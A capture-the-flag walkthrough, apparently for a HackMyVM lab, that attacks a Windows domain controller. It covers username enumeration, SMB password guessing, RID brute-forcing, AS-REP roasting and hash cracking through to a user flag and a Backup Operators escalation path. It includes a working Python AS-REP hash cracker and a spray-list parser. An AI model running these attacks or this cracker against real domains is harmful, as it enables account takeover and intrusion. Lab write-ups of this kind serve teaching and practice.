Difficulty: Medium
kali: 192.168.56.104
Target: 192.168.56.126
> arp-scan -l
Interface: eth0, type: EN10MB, MAC: 00:0c:29:d2:e0:49, IPv4: 192.168.56.104
Starting arp-scan 1.10.0 with 256 hosts (https://github.com/royhills/arp-scan)
192.168.56.1 0a:00:27:00:00:05 (Unknown: locally administered)
192.168.56.100 08:00:27:77:db:85 PCS Systemtechnik GmbH
192.168.56.126 08:00:27:be:ce:fb PCS Systemtechnik GmbH
3 packets received by filter, 0 packets dropped by kernel
Ending arp-scan 1.10.0: 256 hosts scanned in 1.946 seconds (131.55 hosts/sec). 3 responded
Port scan
> nmap 192.168.56.126 -sS -sV -p- -T5 -A
Starting Nmap 7.94SVN ( https://nmap.org ) at 2024-07-16 11:12 CST
Nmap scan report for christmas.hmv (192.168.56.126)
Host is up (0.00025s latency).
Not shown: 65517 filtered tcp ports (no-response)
PORT STATE SERVICE VERSION
53/tcp open domain Simple DNS Plus
88/tcp open kerberos-sec Microsoft Windows Kerberos (server time: 2024-07-16 18:13:10Z)
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
389/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
445/tcp open microsoft-ds?
464/tcp open kpasswd5?
593/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
636/tcp open tcpwrapped
3268/tcp open ldap Microsoft Windows Active Directory LDAP (Domain: SOUPEDECODE.LOCAL0., Site: Default-First-Site-Name)
3269/tcp open tcpwrapped
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-title: Not Found
|_http-server-header: Microsoft-HTTPAPI/2.0
9389/tcp open mc-nmf .NET Message Framing
49664/tcp open msrpc Microsoft Windows RPC
49667/tcp open msrpc Microsoft Windows RPC
49676/tcp open ncacn_http Microsoft Windows RPC over HTTP 1.0
49689/tcp open msrpc Microsoft Windows RPC
49709/tcp open msrpc Microsoft Windows RPC
MAC Address: 08:00:27:BE:CE:FB (Oracle VirtualBox virtual NIC)
Warning: OSScan results may be unreliable because we could not find at least 1 open and 1 closed port
Device type: general purpose
Running (JUST GUESSING): Microsoft Windows 2022|11|2016 (97%)
OS CPE: cpe:/o:microsoft:windows_server_2016
Aggressive OS guesses: Microsoft Windows Server 2022 (97%), Microsoft Windows 11 21H2 (91%), Microsoft Windows Server 2016 (91%)
No exact OS matches for host (test conditions non-ideal).
Network Distance: 1 hop
Service Info: Host: DC01; OS: Windows; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: 14h59m58s
| smb2-security-mode:
| 3:1:1:
|_ Message signing enabled and required
| smb2-time:
| date: 2024-07-16T18:14:02
|_ start_date: N/A
|_nbstat: NetBIOS name: DC01, NetBIOS user: <unknown>, NetBIOS MAC: 08:00:27:be:ce:fb (Oracle VirtualBox virtual NIC)
TRACEROUTE
HOP RTT ADDRESS
1 0.25 ms christmas.hmv (192.168.56.126)
OS and Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 152.39 seconds
The open-port picture is the same as on DC1, so start with the usual SMB enumeration.
SMB enumeration
> smbmap -H 192.168.56.126 -u anonymous
________ ___ ___ _______ ___ ___ __ _______
/" )|" \ /" || _ "\ |" \ /" | /""\ | __ "\
(: \___/ \ \ // |(. |_) :) \ \ // | / \ (. |__) :)
\___ \ /\ \/. ||: \/ /\ \/. | /' /\ \ |: ____/
__/ \ |: \. |(| _ \ |: \. | // __' \ (| /
/" \ :) |. \ /: ||: |_) :)|. \ /: | / / \ \ /|__/ \
(_______/ |___|\__/|___|(_______/ |___|\__/|___|(___/ \___)(_______)
-----------------------------------------------------------------------------
SMBMap - Samba Share Enumerator | Shawn Evans - ShawnDEvans@gmail.com
https://github.com/ShawnDEvans/smbmap
[*] Detected 1 hosts serving SMB
[*] Established 0 SMB session(s)
No anonymous shares at all this time, so lookupsid is not an option yet; find the domain name first.
> ldapsearch -H ldap://192.168.56.126 -x -s base -b '' "(objectClass=*)" "*" +
ldapServiceName: SOUPEDECODE.LOCAL:dc01$@SOUPEDECODE.LOCAL
dnsHostName: DC01.SOUPEDECODE.LOCAL
The domain is still SOUPEDECODE.LOCAL; add it to /etc/hosts:
192.168.56.126 dc01.soupedecode.local soupedecode.local
Then enumerate usernames with Kerbrute. The KDC answers an AS-REQ differently for existing and non-existent principals, so this needs no credentials:
> ./kerbrute_linux_amd64 userenum --dc 192.168.56.126 -d soupedecode.local /usr/share/wordlists/seclists/Usernames/xato-net-10-million-usernames.txt
__ __ __
/ /_____ _____/ /_ _______ __/ /____
/ //_/ _ \/ ___/ __ \/ ___/ / / / __/ _ \
/ ,< / __/ / / /_/ / / / /_/ / /_/ __/
/_/|_|\___/_/ /_.___/_/ \__,_/\__/\___/
Version: v1.0.3 (9dad6e1) - 07/16/24 - Ronnie Flathers @ropnop
2024/07/16 14:25:29 > Using KDC(s):
2024/07/16 14:25:29 > 192.168.56.126:88
2024/07/16 14:25:29 > [+] VALID USERNAME: charlie@soupedecode.local
2024/07/16 14:25:29 > [+] VALID USERNAME: Charlie@soupedecode.local
2024/07/16 14:25:29 > [+] VALID USERNAME: administrator@soupedecode.local
2024/07/16 14:25:30 > [+] VALID USERNAME: Administrator@soupedecode.local
2024/07/16 14:25:30 > [+] VALID USERNAME: CHARLIE@soupedecode.local
2024/07/16 14:26:37 > [+] VALID USERNAME: wreed11@soupedecode.local
Save the usernames found and run them through Metasploit's smb_login (each username is also tried as its own password):
msf6 auxiliary(scanner/smb/smb_login) > run
[*] 192.168.56.126:445 - 192.168.56.126:445 - Starting SMB login bruteforce
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\charlie:charlie'
[!] 192.168.56.126:445 - No active DB -- Credential data will not be saved!
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\Charlie:charlie'
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\administrator:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\administrator:administrator',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\Administrator:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\Administrator:Administrator',
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\CHARLIE:charlie'
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\wreed11:charlie',
[-] 192.168.56.126:445 - 192.168.56.126:445 - Failed: '.\wreed11:wreed11',
[*] 192.168.56.126:445 - Scanned 1 of 1 hosts (100% complete)
[*] 192.168.56.126:445 - Bruteforce completed, 3 credentials were successful.
[*] 192.168.56.126:445 - You can open an SMB session with these credentials and CreateSession set to true
[*] Auxiliary module execution completed
That gives one credential pair: charlie:charlie.
lookupsid
List the shares with it:
> smbmap -H 192.168.56.126 -u charlie -p charlie
[*] Detected 1 hosts serving SMB
[*] Established 1 SMB session(s)
[+] IP: 192.168.56.126:445 Name: christmas.hmv Status: Authenticated
Disk Permissions Comment
---- ----------- -------
ADMIN$ NO ACCESS Remote Admin
C$ NO ACCESS Default share
IPC$ READ ONLY Remote IPC
NETLOGON READ ONLY Logon server share
SYSVOL READ ONLY Logon server share
Browsing the readable shares turned up nothing useful. IPC$ is readable, though, which is all lookupsid needs (it brute-forces RIDs over the LSARPC named pipe):
> lookupsid.py charlie@192.168.56.126
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
[*] Brute forcing SIDs at 192.168.56.126
[*] StringBinding ncacn_np:192.168.56.126[\pipe\lsarpc]
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\Administrator (SidTypeUser)
501: SOUPEDECODE\Guest (SidTypeUser)
502: SOUPEDECODE\krbtgt (SidTypeUser)
512: SOUPEDECODE\Domain Admins (SidTypeGroup)
513: SOUPEDECODE\Domain Users (SidTypeGroup)
514: SOUPEDECODE\Domain Guests (SidTypeGroup)
515: SOUPEDECODE\Domain Computers (SidTypeGroup)
516: SOUPEDECODE\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\Cert Publishers (SidTypeAlias)
518: SOUPEDECODE\Schema Admins (SidTypeGroup)
519: SOUPEDECODE\Enterprise Admins (SidTypeGroup)
520: SOUPEDECODE\Group Policy Creator Owners (SidTypeGroup)
521: SOUPEDECODE\Read-only Domain Controllers (SidTypeGroup)
522: SOUPEDECODE\Cloneable Domain Controllers (SidTypeGroup)
...
Extract the usernames (the lookupsid output was saved to user.txt; substr($2, 13) strips the 12-character SOUPEDECODE\ prefix, but it keeps group entries as well, so first words such as Domain and Enterprise end up in the list too):
cat user.txt | awk '{print substr($2, 13)}' > username.txt
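A parser for the lookupsid output, as an added example that is not part of the write-up: it keeps only SidTypeUser entries, sets machine accounts aside, and drops the group names that the awk one-liner leaves in username.txt. The sample lines are copied from the run above; the last two (DC01$ and charlie, with their RIDs) are constructed to stand in for the elided part.

```python
"""Parse impacket lookupsid.py output into users, machine accounts and groups.

Added example, not part of the original write-up. The sample text below is
taken from the lookupsid run above; the last two entries are constructed.
"""
import re

# Format printed by lookupsid.py: "<rid>: <DOMAIN>\<name> (<SidType>)"
LOOKUPSID_LINE = re.compile(r"^\s*(\d+):\s+([^\\]+)\\(.+?)\s+\((SidType\w+)\)\s*$")

# Sample lookupsid output (abbreviated; the DC01$ and charlie RIDs are made up).
SAMPLE = """\
[*] Domain SID is: S-1-5-21-2986980474-46765180-2505414164
498: SOUPEDECODE\\Enterprise Read-only Domain Controllers (SidTypeGroup)
500: SOUPEDECODE\\Administrator (SidTypeUser)
501: SOUPEDECODE\\Guest (SidTypeUser)
502: SOUPEDECODE\\krbtgt (SidTypeUser)
512: SOUPEDECODE\\Domain Admins (SidTypeGroup)
516: SOUPEDECODE\\Domain Controllers (SidTypeGroup)
517: SOUPEDECODE\\Cert Publishers (SidTypeAlias)
1000: SOUPEDECODE\\DC01$ (SidTypeUser)
1103: SOUPEDECODE\\charlie (SidTypeUser)
"""


def parse_lookupsid(text: str) -> dict:
    """Return {'domain': str, 'users': [...], 'machines': [...], 'groups': [...]}."""
    out = {"domain": None, "users": [], "machines": [], "groups": []}
    for line in text.splitlines():
        m = LOOKUPSID_LINE.match(line)
        if not m:
            continue  # banner, "Domain SID is", blank lines
        _rid, domain, name, sid_type = m.groups()
        out["domain"] = out["domain"] or domain
        if sid_type == "SidTypeUser":
            # Machine accounts end in '$'; they are not password-spray targets
            (out["machines"] if name.endswith("$") else out["users"]).append(name)
        else:
            # SidTypeGroup / SidTypeAlias: 'Domain Admins' would otherwise become 'Domain'
            out["groups"].append(name)
    return out


def spray_list(text: str) -> list:
    """Usernames worth spraying: real users only, de-duplicated, order kept."""
    return list(dict.fromkeys(parse_lookupsid(text)["users"]))


if __name__ == "__main__":
    import sys
    # Pipe lookupsid output in, e.g.  lookupsid.py charlie@192.168.56.126 | python3 this.py
    src = sys.stdin.read() if not sys.stdin.isatty() else SAMPLE
    print("\n".join(spray_list(src)))
```

The machine list is worth keeping separately: DC01$ shows up again later, once its NT hash falls out of the LSA secrets.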
Then brute-force SMB again with the larger list:
msf6 auxiliary(scanner/smb/smb_login) > run
[+] 192.168.56.126:445 - 192.168.56.126:445 - Success: '.\charlie:charlie'
Nothing new.
AS-REP Roasting
First try Kerberoasting, which targets accounts with an SPN (any domain credential, charlie here, is enough to request the tickets):
> GetUserSPNs.py -request -dc-ip 192.168.56.126 soupedecode.local/charlie
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
Password:
No entries found!
Now try AS-REP Roasting with the username list. With -no-pass an AS-REQ without pre-authentication is sent for every name, so any account with "Do not require Kerberos preauthentication" set hands back an AS-REP encrypted with its own key, which can be cracked offline:
> GetNPUsers.py -usersfile username.txt -no-pass -dc-ip 192.168.56.126 soupedecode.local/
Impacket v0.9.20 - Copyright 2019 SecureAuth Corporation
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User Administrator doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User DC01$ doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] User bmark0 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User otara1 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kleo2 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User eyara3 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pquinn4 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jharper5 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bxenia6 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User gmona7 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User oaaron8 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pleo9 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User evictor10 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User wreed11 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User bgavin12 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ndelia13 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User akevin14 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User kxenia15 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ycody16 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qnora17 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User dyvonne18 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qxenia19 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rreed20 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User icody21 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ftom22 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ijake23 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rpenny24 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User jiris25 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User colivia26 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User pyvonne27 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User zfrank28 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User ybob317 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User file_svc doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User charlie doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User qethan32 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User khenry33 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User sjudy34 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User rrachel35 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User caiden36 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User xbella37 doesn't have UF_DONT_REQUIRE_PREAUTH set
[-] User smark38 doesn't have UF_DONT_REQUIRE_PREAUTH set
$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:e5697462f07ce86dc5706de972c92a93$11bf6eae5807576755b8287618864bd5b7129080c466b93eac9363c08dbb3a3e3735a9ce5427b0be525f0f9cdb78fb40ad1b377762f9b9c461c6656a60014e235d71154d6ac041899b424f8b8a206b0be3e8a2c5947eb7cb5f6ae2da6d7c853bc7ac3e37f7c0bab1eda9acbe06d4a2cce00cf97cc7656e2f01e254e01df04fc5275a9fb3a05f91529bf2a8b5177775595248d025c26f05589261a6b038269128c72a1ad699437c9c1c545b1e042db0659a789cd4eca954939eb80da0268f2962027783dd90ccd80d1a1eb4c07772fad5537f3020f3eee5c18e9f2be7d38d32b1ac40066ec988ba72f10adfd378ccec5b5f2e4e0fbe71
That is the AS-REP hash for zximena448, the one account with pre-authentication disabled. The KDC_ERR_C_PRINCIPAL_UNKNOWN lines are the group-name fragments (Domain, Enterprise, ...) that the awk one-liner left in username.txt, and the two KDC_ERR_CLIENT_REVOKED lines are Guest and krbtgt, which are disabled. Save the hash to a file (aaa here) and try cracking it:
> john aaa --wordlist=/usr/share/wordlists/rockyou.txt
Using default input encoding: UTF-8
Loaded 1 password hash (krb5asrep, Kerberos 5 AS-REP etype 17/18/23 [MD4 HMAC-MD5 RC4 / PBKDF2 HMAC-SHA1 AES 256/256 AVX2 8x])
Press 'q' or Ctrl-C to abort, almost any other key for status
internet ($krb5asrep$23$zximena448@SOUPEDECODE.LOCAL)
1g 0:00:00:00 DONE (2024-07-16 15:16) 100.0g/s 33600p/s 33600c/s 33600C/s smokey..olivia
Use the "--show" option to display all of the cracked passwords reliably
Session completed.
The password is internet.
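What john did per candidate, as an added example that is neither john's code nor part of the write-up: the RFC 4757 RC4-HMAC decrypt-and-verify for an etype 23 AS-REP (hashcat mode 18200 does the same), using only the standard library. MD4 is written out because hashlib on OpenSSL 3 builds usually refuses it. PAGE_HASH is the zximena448 hash from the GetNPUsers run above; the make_asrep helper, its EXAMPLE.LOCAL realm and the tiny wordlists are assumptions used for self-checking.

```python
"""RFC 4757 RC4-HMAC check for an etype-23 AS-REP hash, one candidate at a time.

Added example, not from the write-up and not john's code. PAGE_HASH is copied
from the GetNPUsers output above; everything else is written for this example.
"""
import hashlib
import hmac
import struct

MASK = 0xFFFFFFFF
AS_REP_ENC_PART_USAGE = 8  # RFC 4120 key usage number for the AS-REP enc-part


def md4(data: bytes) -> bytes:
    """RFC 1320 MD4; an NT hash is MD4 over the UTF-16LE password."""
    f = lambda x, y, z: (x & y) | (~x & z)
    g = lambda x, y, z: (x & y) | (x & z) | (y & z)
    h = lambda x, y, z: x ^ y ^ z
    rotl = lambda x, n: ((x << n) | (x >> (32 - n))) & MASK
    data += b"\x80" + b"\x00" * ((55 - len(data)) % 64) + struct.pack("<Q", len(data) * 8)
    state = [0x67452301, 0xEFCDAB89, 0x98BADCFE, 0x10325476]
    r3 = (0, 8, 4, 12, 2, 10, 6, 14, 1, 9, 5, 13, 3, 11, 7, 15)
    for off in range(0, len(data), 64):
        x = struct.unpack("<16I", data[off:off + 64])
        a, b, c, d = state
        for i in range(48):
            if i < 16:
                fn, k, s, add = f, i, (3, 7, 11, 19)[i % 4], 0
            elif i < 32:
                fn, k, s, add = g, (i % 4) * 4 + (i - 16) // 4, (3, 5, 9, 13)[i % 4], 0x5A827999
            else:
                fn, k, s, add = h, r3[i - 32], (3, 9, 11, 15)[i % 4], 0x6ED9EBA1
            a, b, c, d = d, rotl((a + fn(b, c, d) + x[k] + add) & MASK, s), b, c
        state = [(v + w) & MASK for v, w in zip(state, (a, b, c, d))]
    return struct.pack("<4I", *state)


def nt_hash(password: str) -> bytes:
    return md4(password.encode("utf-16le"))


def rc4(key: bytes, data: bytes) -> bytes:
    s = list(range(256))
    j = 0
    for i in range(256):  # key scheduling
        j = (j + s[i] + key[i % len(key)]) & 0xFF
        s[i], s[j] = s[j], s[i]
    out, i, j = bytearray(), 0, 0
    for byte in data:  # keystream generation
        i = (i + 1) & 0xFF
        j = (j + s[i]) & 0xFF
        s[i], s[j] = s[j], s[i]
        out.append(byte ^ s[(s[i] + s[j]) & 0xFF])
    return bytes(out)


def hmac_md5(key: bytes, msg: bytes) -> bytes:
    return hmac.new(key, msg, hashlib.md5).digest()


def parse_asrep(line: str):
    """Split '$krb5asrep$23$user@REALM:checksum$edata' into (principal, checksum, edata)."""
    prefix = "$krb5asrep$23$"
    if not line.startswith(prefix):
        raise ValueError("only etype 23 (RC4-HMAC) hashes are handled here")
    principal, rest = line[len(prefix):].split(":", 1)
    checksum_hex, edata_hex = rest.split("$", 1)
    return principal, bytes.fromhex(checksum_hex), bytes.fromhex(edata_hex)


def check_candidate(checksum: bytes, edata: bytes, password: str) -> bool:
    """RFC 4757 decrypt-and-verify: the whole per-guess work of a cracker."""
    k_i = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_ENC_PART_USAGE))
    k_e = hmac_md5(k_i, checksum)  # the RC4 key is derived from the checksum
    plaintext = rc4(k_e, edata)     # 8-byte confounder || EncASRepPart
    return hmac.compare_digest(hmac_md5(k_i, plaintext), checksum)


def crack_asrep(line: str, wordlist):
    """Return the first candidate that verifies, or None."""
    _, checksum, edata = parse_asrep(line)
    for candidate in wordlist:
        candidate = candidate.rstrip("\r\n")
        if check_candidate(checksum, edata, candidate):
            return candidate
    return None


def make_asrep(password: str, enc_part: bytes, confounder: bytes = b"\x00" * 8) -> str:
    """Encrypt side, for self-tests only (a real KDC uses a random confounder)."""
    k_i = hmac_md5(nt_hash(password), struct.pack("<I", AS_REP_ENC_PART_USAGE))
    checksum = hmac_md5(k_i, confounder + enc_part)
    edata = rc4(hmac_md5(k_i, checksum), confounder + enc_part)
    return f"$krb5asrep$23$test@EXAMPLE.LOCAL:{checksum.hex()}${edata.hex()}"


# The zximena448 hash from the GetNPUsers run above.
PAGE_HASH = (
    "$krb5asrep$23$zximena448@SOUPEDECODE.LOCAL:e5697462f07ce86dc5706de972c92a93$"
    "11bf6eae5807576755b8287618864bd5b7129080c466b93eac9363c08dbb3a3e3735a9ce5427b0be525f0f9cdb78fb40ad1b377762f9b9c461c6656a60014e235d71154d6ac041899b424f8b8a206b0be3e8a2c5947eb7cb5f6ae2da6d7c853bc7ac3e37f7c0bab1eda9acbe06d4a2cce00cf97cc7656e2f01e254e01df04fc5275a9fb3a05f91529bf2a8b5177775595248d025c26f05589261a6b038269128c72a1ad699437c9c1c545b1e042db0659a789cd4eca954939eb80da0268f2962027783dd90ccd80d1a1eb4c07772fad5537f3020f3eee5c18e9f2be7d38d32b1ac40066ec988ba72f10adfd378ccec5b5f2e4e0fbe71"
)

if __name__ == "__main__":
    # Constructed three-word list; rockyou.txt was used in the write-up. Recovers 'internet'.
    print(crack_asrep(PAGE_HASH, ["smokey", "olivia", "internet"]))
```

Two things this makes visible: the only secret-dependent step is one MD4 plus three HMAC-MD5 calls and an RC4 pass, which is why rockyou goes through in under a second, and the check is keyed on the 16-byte checksum rather than on parsing the decrypted ASN.1, so a wrong guess is rejected without any structure knowledge. AES etypes (17/18) replace the NT hash with a PBKDF2-derived key, which is the whole reason they crack orders of magnitude slower.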
Check the SMB shares with this account:
> crackmapexec smb 192.168.56.126 -u zximena448 -p internet --shares
SMB 192.168.56.126 445 DC01 [*] Windows Server 2022 Build 20348 x64 (name:DC01) (domain:SOUPEDECODE.LOCAL) (signing:True) (SMBv1:False)
SMB 192.168.56.126 445 DC01 [+] SOUPEDECODE.LOCAL\zximena448:internet
SMB 192.168.56.126 445 DC01 [+] Enumerated shares
SMB 192.168.56.126 445 DC01 Share Permissions Remark
SMB 192.168.56.126 445 DC01 ----- ----------- ------
SMB 192.168.56.126 445 DC01 ADMIN$ READ Remote Admin
SMB 192.168.56.126 445 DC01 C$ READ,WRITE Default share
SMB 192.168.56.126 445 DC01 IPC$ READ Remote IPC
SMB 192.168.56.126 445 DC01 NETLOGON READ Logon server share
SMB 192.168.56.126 445 DC01 SYSVOL READ Logon server share
> smbclient \\\\192.168.56.126\\c$ -U zximena448
Password for [WORKGROUP\zximena448]:
Try "help" to get a list of possible commands.
smb: \> ls
$WinREAgent DH 0 Sun Jun 16 03:19:51 2024
Documents and Settings DHSrn 0 Sun Jun 16 10:51:08 2024
DumpStack.log.tmp AHS 12288 Wed Jul 17 10:02:30 2024
pagefile.sys AHS 1476395008 Wed Jul 17 10:02:30 2024
PerfLogs D 0 Sat May 8 16:15:05 2021
Program Files DR 0 Sun Jun 16 01:54:31 2024
Program Files (x86) D 0 Sat May 8 17:34:13 2021
ProgramData DHn 0 Sun Jun 16 10:51:08 2024
Recovery DHSn 0 Sun Jun 16 10:51:08 2024
System Volume Information DHS 0 Sun Jun 16 03:02:21 2024
Users DR 0 Tue Jun 18 02:31:08 2024
Windows D 0 Wed Jul 17 07:11:18 2024
12942591 blocks of size 4096. 10926157 blocks available
smb: \> cd Users
smb: \Users\> ls
. DR 0 Tue Jun 18 02:31:08 2024
.. DHS 0 Wed Jul 17 10:04:40 2024
Administrator D 0 Sun Jun 16 03:56:40 2024
All Users DHSrn 0 Sat May 8 16:26:16 2021
Default DHR 0 Sun Jun 16 10:51:08 2024
Default User DHSrn 0 Sat May 8 16:26:16 2021
desktop.ini AHS 174 Sat May 8 16:14:03 2021
Public DR 0 Sun Jun 16 01:54:32 2024
zximena448 D 0 Tue Jun 18 02:30:22 2024
12942591 blocks of size 4096. 10926157 blocks available
smb: \Users\> cd zximena448
smb: \Users\zximena448\> cd Desktop
smb: \Users\zximena448\Desktop\> dir
. DR 0 Tue Jun 18 02:31:24 2024
.. D 0 Tue Jun 18 02:30:22 2024
desktop.ini AHS 282 Tue Jun 18 02:30:22 2024
user.txt A 33 Thu Jun 13 04:01:30 2024
12942591 blocks of size 4096. 10926137 blocks available
smb: \Users\zximena448\Desktop\> get user.txt
getting file \Users\zximena448\Desktop\user.txt of size 33 as user.txt (3.2 KiloBytes/sec) (average 3.2 KiloBytes/sec)
That is the user flag.
Privilege escalation
First pull information over LDAP, now with valid credentials:
> ldapsearch -x -H ldap://192.168.56.126 -D "zximena448@soupedecode.local" -w internet -b "dc=soupedecode,dc=local" "(objectClass=*)" | grep memberOf
memberOf: CN=Group Policy Creator Owners,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Domain Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Enterprise Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Schema Admins,CN=Users,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Guests,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Pre-Windows 2000 Compatible Access,CN=Builtin,DC=SOUPEDECODE,DC=L
memberOf: CN=Users,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Administrators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Users,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Guests,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Denied RODC Password Replication Group,CN=Users,DC=SOUPEDECODE,DC
memberOf: CN=Backup Operators,CN=Builtin,DC=SOUPEDECODE,DC=LOCAL
The query above is unfiltered, so these memberOf lines come from every object in the domain: the Domain Admins / Enterprise Admins entries belong to Administrator, and filtering on sAMAccountName=zximena448 would have shown only her groups. The line that matters is the last one: zximena448 is a member of Backup Operators. That group carries SeBackupPrivilege, which lets her read any file regardless of its ACL and, through the Remote Registry service, save the SAM, SYSTEM and SECURITY hives off the DC.
